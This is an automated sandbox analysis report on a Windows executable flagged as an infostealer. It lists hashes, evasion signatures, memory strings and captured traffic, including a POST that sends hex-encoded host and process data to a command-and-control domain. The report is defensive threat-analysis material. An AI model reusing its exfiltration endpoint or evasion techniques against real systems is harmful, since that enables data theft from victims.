Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S0O8qbVwLk.exe

Overview

General Information

Sample name:S0O8qbVwLk.exe
renamed because original name is a hash value
Original sample name:308b5cef77c672f677d2245307116688.exe
Analysis ID:1578955
MD5:308b5cef77c672f677d2245307116688
SHA1:7c71404394a0f8cc5db7e045b1397211fd5ccf8c
SHA256:5c6029db1e5fd370a90763ce8f2f2ab02a4188c4f82e342a7dca9fcba555156f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • S0O8qbVwLk.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\S0O8qbVwLk.exe" MD5: 308B5CEF77C672F677D2245307116688)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: S0O8qbVwLk.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: S0O8qbVwLk.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: S0O8qbVwLk.exeJoe Sandbox ML: detected
Source: S0O8qbVwLk.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: S0O8qbVwLk.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 502459Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 502459Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 502459Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: S0O8qbVwLk.exe, 00000000.00000003.2926759037.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948933338.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949494327.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WE
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: S0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: S0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: S0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716

System Summary

barindex
PE file contains section with special chars
Source: S0O8qbVwLk.exeStatic PE information: section name:
Source: S0O8qbVwLk.exeStatic PE information: section name: .idata
Source: S0O8qbVwLk.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
